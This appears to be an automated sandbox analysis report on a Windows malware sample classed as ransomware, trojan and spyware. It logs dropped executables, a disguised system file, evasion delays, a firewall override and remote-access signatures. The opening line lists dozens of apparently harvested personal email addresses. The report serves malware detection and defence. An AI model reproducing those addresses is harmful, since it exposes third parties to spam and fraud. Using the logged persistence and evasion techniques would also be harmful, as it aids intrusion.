                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeFile dropped: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\706[1].txt -> recoveryrr@gmail.comsnul78@mail.rubritosmorenomariana@gmail.comgabbsy01@gmail.comsaikamalgo@gmail.comfion_mei@hotmail.comitfundamentalsgcati@gmail.commashelembe@yahoo.comgabiebella@gmail.comailtonjipa@hotmail.comandrea.m_santos@hotmail.comvilatuaydan@hotmail.espgonza21@student.sisd.netluizns@oi.com.brjaylim513@hotmail.comenilzacunha@hotmail.compedrodias@midiasim.com.brnekronomantikator@gmail.comsofitapiero@homemail.comjsabolevski1@mc2school.orgclaudiacamilaaberastegui@hotmail.comguido.disalvoo@gmail.comjean.luc.laveran@gmail.comelvia.cazares@ttu.edukazvin18@yahoo.comfannyav1989@hotmail.comstore@comfortcandlecompany.comsebboulnois@hotmail.comtoubasindidi28@gmail.comhughesjewelry@hotmail.comalexias450@gmail.comladesha.danya@gmail.comkaransugar123@gmail.comsentosabina@gmail.commichaeltcraig@yahoo.comjmedioma7@gmail.comtrepound96@yahoo.comgozemotionz@live.dkaniqdharma@gmail.comsania.crespo@sumterschools.orgjazminabellanazar@gmail.comjmacicova@gmail.comrebecaleon34@hotmailJump to dropped file
                            Source: gEkl9O5tiu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeFile created: C:\Windows\ sysesvcmw.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_004066104_2_00406610
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_004066394_2_00406639
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040ECE84_2_0040ECE8
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_004034804_2_00403480
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_00402E904_2_00402E90
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_00408FA04_2_00408FA0
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_004066105_2_00406610
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_004066395_2_00406639
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_0040ECE85_2_0040ECE8
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_004034805_2_00403480
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_00402E905_2_00402E90
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_00408FA05_2_00408FA0
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_004066106_2_00406610
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_004066396_2_00406639
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_0040ECE86_2_0040ECE8
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_004034806_2_00403480
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_00402E906_2_00402E90
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_00408FA06_2_00408FA0
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040BE60 NtQuerySystemTime,RtlTimeToSecondsSince1980,4_2_0040BE60
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040EF2D NtQueryVirtualMemory,4_2_0040EF2D
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_0040BE60 NtQuerySystemTime,RtlTimeToSecondsSince1980,5_2_0040BE60
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_0040EF2D NtQueryVirtualMemory,5_2_0040EF2D
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_0040BE60 NtQuerySystemTime,RtlTimeToSecondsSince1980,6_2_0040BE60
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_0040EF2D NtQueryVirtualMemory,6_2_0040EF2D
                            Source: 2465513676.exe.11.drStatic PE information: Number of sections : 11 > 10
                            Source: nxmr[1].exe.11.drStatic PE information: Number of sections : 11 > 10
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nxmr[1].exe DD12CB27B3867341BF6CA48715756500D3EC56C19B21BB1C1290806AA74CB493
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeMemory allocated: 771D0000 page execute and read and writeJump to behavior
                            Source: gEkl9O5tiu.exeReversingLabs: Detection: 47%
                            Source: gEkl9O5tiu.exeVirustotal: Detection: 57%
                            Source: gEkl9O5tiu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\gEkl9O5tiu.exe C:\Users\user\Desktop\gEkl9O5tiu.exe
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeProcess created: C:\Users\user\AppData\Local\Temp\2550821914.exe C:\Users\user\AppData\Local\Temp\2550821914.exe
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeProcess created: C:\Windows\ sysesvcmw.exe C:\Windows\ sysesvcmw.exe
                            Source: unknownProcess created: C:\Windows\ sysesvcmw.exe "C:\Windows\ sysesvcmw.exe"
                            Source: C:\Windows\ sysesvcmw.exeProcess created: C:\Users\user\AppData\Local\Temp\1925824589.exe C:\Users\user\AppData\Local\Temp\1925824589.exe
                            Source: C:\Windows\ sysesvcmw.exeProcess created: C:\Users\user\AppData\Local\Temp\150623101.exe C:\Users\user\AppData\Local\Temp\150623101.exe
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeProcess created: C:\Users\user\AppData\Local\Temp\2465513676.exe C:\Users\user\AppData\Local\Temp\2465513676.exe
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeProcess created: C:\Users\user\AppData\Local\Temp\2550821914.exe C:\Users\user\AppData\Local\Temp\2550821914.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeProcess created: C:\Windows\ sysesvcmw.exe C:\Windows\ sysesvcmw.exeJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeProcess created: C:\Users\user\AppData\Local\Temp\1925824589.exe C:\Users\user\AppData\Local\Temp\1925824589.exeJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeProcess created: C:\Users\user\AppData\Local\Temp\150623101.exe C:\Users\user\AppData\Local\Temp\150623101.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeProcess created: C:\Users\user\AppData\Local\Temp\2465513676.exe C:\Users\user\AppData\Local\Temp\2465513676.exeJump to behavior
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
                            Source: C:\Windows\ sysesvcmw.exeFile created: C:\Users\user\tbnds.datJump to behavior
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeFile created: C:\Users\user\AppData\Local\Temp\2550821914.exeJump to behavior
                            Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@12/15@4697/100
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040C000 SysAllocString,CoCreateInstance,SysFreeString,4_2_0040C000
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_004054A0 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,4_2_004054A0
                            Source: C:\Windows\ sysesvcmw.exeMutant created: \Sessions\1\BaseNamedObjects\2u9o0b7n
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeMutant created: \Sessions\1\BaseNamedObjects\759498
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeCommand line argument: 7594989_2_00EA26A0
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
                            Source: gEkl9O5tiu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: gEkl9O5tiu.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                            Source: gEkl9O5tiu.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                            Source: gEkl9O5tiu.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                            Source: gEkl9O5tiu.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                            Source: gEkl9O5tiu.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeCode function: 1_2_01091A41 push ecx; ret 1_2_01091A54
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeCode function: 9_2_00EA2E31 push ecx; ret 9_2_00EA2E44
                            Source: nxmr[1].exe.11.drStatic PE information: section name: .xdata
                            Source: 2465513676.exe.11.drStatic PE information: section name: .xdata

                            Persistence and Installation Behavior

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeExecutable created and started: C:\Windows\ sysesvcmw.exeJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeFile created: C:\Users\user\AppData\Local\Temp\1925824589.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeFile created: C:\Users\user\AppData\Local\Temp\2465513676.exeJump to dropped file
                            Source: C:\Windows\ sysesvcmw.exeFile created: C:\Users\user\AppData\Local\Temp\150623101.exeJump to dropped file
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeFile created: C:\Users\user\AppData\Local\Temp\2550821914.exeJump to dropped file
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newtpp[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nxmr[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeFile created: C:\Windows\ sysesvcmw.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeFile created: C:\Windows\ sysesvcmw.exeJump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeFile opened: C:\Users\user\AppData\Local\Temp\2550821914.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeFile opened: C:\Users\user\AppData\Local\Temp\2550821914.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeFile opened: C:\Windows\ sysesvcmw.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeFile opened: C:\Users\user\AppData\Local\Temp\1925824589.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeFile opened: C:\Users\user\AppData\Local\Temp\150623101.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeFile opened: C:\Users\user\AppData\Local\Temp\1925824589.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeFile opened: C:\Users\user\AppData\Local\Temp\2465513676.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                            Source: C:\Windows\ sysesvcmw.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-4316
                            Source: C:\Windows\ sysesvcmw.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-4316
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-4314
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-4314
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040B5404_2_0040B540
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_0040B5405_2_0040B540
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_0040B5406_2_0040B540
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exe TID: 3016Thread sleep time: -180000s >= -30000sJump to behavior
                            Source: C:\Windows\ sysesvcmw.exe TID: 1160Thread sleep time: -360000s >= -30000sJump to behavior
                            Source: C:\Windows\ sysesvcmw.exe TID: 2236Thread sleep time: -1800000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exe TID: 2060Thread sleep count: 34 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exe TID: 2060Thread sleep time: -7344000000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exe TID: 1376Thread sleep time: -300000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exe TID: 2060Thread sleep time: -216000000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exe TID: 9288Thread sleep time: -180000s >= -30000sJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\2465513676.exeLast function: Thread delayed
                            Source: C:\Windows\ sysesvcmw.exeThread delayed: delay time: 900000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeThread delayed: delay time: 216000000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeThread delayed: delay time: 216000000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeEvaded block: after key decisiongraph_4-4371
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeEvaded block: after key decisiongraph_4-4318
                            Source: C:\Windows\ sysesvcmw.exeEvaded block: after key decisiongraph_6-4313
                            Source: C:\Windows\ sysesvcmw.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-4324
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_4-5197
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_4-4321
                            Source: C:\Windows\ sysesvcmw.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_5-5665
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeAPI coverage: 3.8 %
                            Source: C:\Windows\ sysesvcmw.exeAPI coverage: 1.3 %
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040B5404_2_0040B540
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_0040B5406_2_0040B540
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040EB00 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,4_2_0040EB00
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_00404E80 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00404E80
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_00404FC0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_00404FC0
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_00404E80 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00404E80
                            Source: C:\Windows\ sysesvcmw.exeCode function: 5_2_00404FC0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_00404FC0
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_00404E80 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00404E80
                            Source: C:\Windows\ sysesvcmw.exeCode function: 6_2_00404FC0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,6_2_00404FC0
                            Source: C:\Windows\ sysesvcmw.exeThread delayed: delay time: 900000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeThread delayed: delay time: 216000000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeThread delayed: delay time: 216000000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeAPI call chain: ExitProcess graph end nodegraph_4-4317
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeAPI call chain: ExitProcess graph end nodegraph_4-4327
                            Source: C:\Windows\ sysesvcmw.exeAPI call chain: ExitProcess graph end nodegraph_5-4348
                            Source: C:\Windows\ sysesvcmw.exeAPI call chain: ExitProcess graph end nodegraph_5-4319
                            Source: C:\Windows\ sysesvcmw.exeAPI call chain: ExitProcess graph end nodegraph_5-4330
                            Source: C:\Windows\ sysesvcmw.exeAPI call chain: ExitProcess graph end nodegraph_6-4346
                            Source: C:\Windows\ sysesvcmw.exeAPI call chain: ExitProcess graph end nodegraph_6-4327
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeCode function: 1_2_01091B78 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,1_2_01091B78
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_00408930 GetProcessHeaps,4_2_00408930
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeCode function: 1_2_01091B78 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,1_2_01091B78
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeCode function: 9_2_00EA2F68 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,9_2_00EA2F68
                            Source: C:\Windows\ sysesvcmw.exeFile opened: Windows Firewall: C:\Windows\SysWOW64\FirewallAPI.dllJump to behavior
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeProcess created: C:\Users\user\AppData\Local\Temp\2550821914.exe C:\Users\user\AppData\Local\Temp\2550821914.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeProcess created: C:\Windows\ sysesvcmw.exe C:\Windows\ sysesvcmw.exeJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeProcess created: C:\Users\user\AppData\Local\Temp\1925824589.exe C:\Users\user\AppData\Local\Temp\1925824589.exeJump to behavior
                            Source: C:\Windows\ sysesvcmw.exeProcess created: C:\Users\user\AppData\Local\Temp\150623101.exe C:\Users\user\AppData\Local\Temp\150623101.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\150623101.exeProcess created: C:\Users\user\AppData\Local\Temp\2465513676.exe C:\Users\user\AppData\Local\Temp\2465513676.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: GetLocaleInfoA,4_2_0040D0F0
                            Source: C:\Windows\ sysesvcmw.exeCode function: GetLocaleInfoA,5_2_0040D0F0
                            Source: C:\Windows\ sysesvcmw.exeCode function: GetLocaleInfoA,6_2_0040D0F0
                            Source: C:\Users\user\Desktop\gEkl9O5tiu.exeCode function: 1_2_01091AA8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_01091AA8
                            Source: C:\Users\user\AppData\Local\Temp\1925824589.exeCode function: 9_2_00EA1490 GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,wsprintfA,9_2_00EA1490

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Source: C:\Windows\ sysesvcmw.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center FirewallOverrideJump to behavior

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: 4.0.2550821914.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.2550821914.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0. sysesvcmw.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000000.399820477.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.379469431.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.370252775.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.381787142.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 2550821914.exe PID: 680, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysesvcmw.exe PID: 1384, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysesvcmw.exe PID: 1840, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2550821914.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\ sysesvcmw.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newtpp[1].exe, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040D8A0 CreateEventA,socket,htons,setsockopt,bind,CreateThread,4_2_0040D8A0
                            Source: C:\Users\user\AppData\Local\Temp\2550821914.exeCode function: 4_2_0040DD70 CreateEventA,socket,bind,CreateThread,4_2_0040DD70
